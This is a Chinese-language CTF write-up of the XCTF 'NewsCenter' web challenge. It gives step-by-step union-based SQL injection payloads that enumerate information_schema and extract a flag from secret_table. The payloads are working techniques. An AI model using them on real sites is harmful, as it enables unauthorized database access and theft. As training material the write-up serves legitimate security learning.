首页 > 其他分享 >CTFer成长记录——CTF之Web专题·攻防世界—NewsCenter

CTFer成长记录——CTF之Web专题·攻防世界—NewsCenter

时间:2023-07-31 17:26:21浏览次数:41  
标签:Web NewsCenter name 回显 CTF table Hello select schema

一、题目链接

https://adworld.xctf.org.cn/challenges/list

二、解法步骤

  

  本题打开是让我们搜新闻,新闻的数据就是来自于数据库的,那么比较容易想到这题应该是sql注入。

  首先判断是否能单引号绕过:输入hello正常回显,但hello' ,发现页面空白,说明hello'会报错,且报错无回显,那么第一步确定变量应该是用双引号存储的,可以用将查询内容用单引号

闭合进行其他的操作。

  接着看看字段数:Hello' order by 3#,发现没有空白页面,而order by 4就有了,说明一共有三个字段。

  继续看看能不能联合查询:Hello' union select 1,2,3#

  结果是可以的,那么查询下数据库版本和名称试试:Hello' union select 1,database(),version()#:

 版本是:5.5的;5.0以上的版本自带information_schema数据库,这数据库下面又有schemata、tables、columns,这些表中又有(schema_name)、(table_name、table_schema)、(table_schema、table_name、column_name)字段。那就是这样。

  如果是5.0版本以上,我们就可以通过系统的数据库来获取很多想要的信息。

  刚才获取了这个题的数据库news,那么接下来就是查表:Hello' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='news'#

  有两个表,这里secret_table感觉更重要些。

  查secret_table中的列:Hello' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='news' #

  发现fl4g字段。

  最后查询fl4g数据:Hello' union select 1,2,fl4g from secret_table#

  

  得到flag。

三、总结

  本题是sql注入的联合查询题目,比较基本。需要注意查询的思路:判断能否用单引号——>判断字段——>联合查询看回显点——>查询版本,数据库名称——>查表——>查列——查字段。

  查表:union select 回显字段1,回显字段2,group_concat(table_name) from information_schema.tables where table_schema='news',在三个回显字段中选一个就行。

  查列:Hello' union select 回显字段1,回显字段2,group_concat(column_name) from information_schema.columns where table_schema='news' #看表中有哪些列,也就是表含有哪些信息。

  查字段:Hello' union select 回显字段1,回显字段2,fl4g from secret_table#,就是把表中的列里的具体数字搞出来。

  参考资料:https://blog.csdn.net/qq_55213436/article/details/125290521

 

标签:Web,NewsCenter,name,回显,CTF,table,Hello,select,schema
From: https://www.cnblogs.com/miraclewolf/p/17593932.html

相关文章

  • web前端学习第一天
    一、web应用程序开发介绍    1.界面部份    2.业务逻辑部份    3.数据存储部份 二、 web应用程序开发三大核心技术   HTML CSS  JAVASCRIPT    html:超文本标记语言        作用:网页内容、结构    css:......
  • Jenkins 修改 webhook 链接 URL
    说明2023-03-1221:11:03 分享了一篇  https://blog.51cto.com/wst021sh/6116280 ,也就是介绍 Pipeline对比的文章。这里在简单阐述一下,Pipeline就是一套运行在Jenkins上的工作流框架,将原来独立运行于单个或者多个节点的任务连接起来,实现单个任务难以完成的复杂流程编排......
  • DASCTF 2023 & 0X401七月暑期挑战赛
    比赛只出了一道,小菜不是罪过-_-controlflow这个题动调到底就行foriinrange(40):after_xor[i]=inp[i]^0x401after_xor[i]+=i*i;foriinrange(11,30,1):x=i-10after_xor[i]^=x*(x+1)foriinrange(40):after_xor[i]-=iafter_xo......
  • web渗透测试(7):跨站点脚本(XSS)
    跨站点脚本源于信息发送给应用程序用户时缺乏编码。这可以用来注入任意的HTML和JavaScript;结果是该有效载荷在合法用户的网络浏览器中运行。与其他攻击相反,XSS漏洞针对应用程序的用户,而不是直接针对服务器。 一些漏洞利用的例子包括:注入假登录表单;检索合法用户的Cookie;......
  • webpack项目本地dev环境正常,部署至微信字体或图片报cors
    由于webpack设置了高于xxx大小的文件不打包,又与小程序平台的域名不一致导致的问题。修改limit,将其调大,以base64方式直接嵌在页面中(字体文件也适用)......
  • CTFer成长记录——CTF之Web专题·攻防世界—unseping
    一、题目链接  https://adworld.xctf.org.cn/challenges/list二、解法步骤  本题主要是代码审计和反序列化;代码审计:首先我们需要知道整个题的基本执行顺序:post传参——>base64编码——>反序列化——>调用__wakeup()魔术方法——>执行waf()方法过滤——>调用析构方法()。......
  • IDEA,Pycharm,Goland,Webstorm 最新发布2023.2版本,亲测好用!
    期待已久的IntelliJIDEA2023.2终于正式发布了,同时发布的还有Pycharm,Goland,Webstorm等。具体的改变相信大家已经提前有所了解的了,我迫不及待的就下载体验了下,UI变好看了,使用起来感觉更流畅,好用推荐!IDEA2023.2最新版激活成功如下GoLand2023.2最新版激活成功如下......
  • 手把手教你在云环境炼丹(部署Stable Diffusion WebUI)
    前几天写了一篇《手把手教你在本机安装StableDiffusion秋叶整合包》的文章,有些同学反映对硬件的要求太高,显卡太TM贵了。今天我再分享一个云服务器炼丹的方法,方便大家快速入门上手,这个云服务不需要特殊网络设置,能连接公网网盘,随开随用,有3090显卡,也有4090显卡,不过我经常使用的是A5......
  • 【Web开发指南】如何用MyEclipse进行JavaScript开发?
    由于MyEclipse中有高级语法高亮显示、智能内容辅助和准确验证等特性,进行JavaScript编码不再是一项繁琐的任务。MyEclipsev2023.1.1离线版下载MyEclipse技术交流群:742336981欢迎一起进群讨论JavaScript项目在MyEclipse 2021及以后的版本中,大多数JavaScript支持都是开箱即用......
  • websocket应用的是哪个协议
    WebSocket应用的是WebSocket协议。WebSocket是一种在单个TCP连接上进行全双工通信的协议,它允许在客户端和服务器之间建立持久性的连接,并支持双向实时数据传输。相比传统的HTTP请求-响应模式,WebSocket具有更低的延迟和更高的性能,适用于实时性要求较高的应用场景,如在线聊天、实时游戏......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99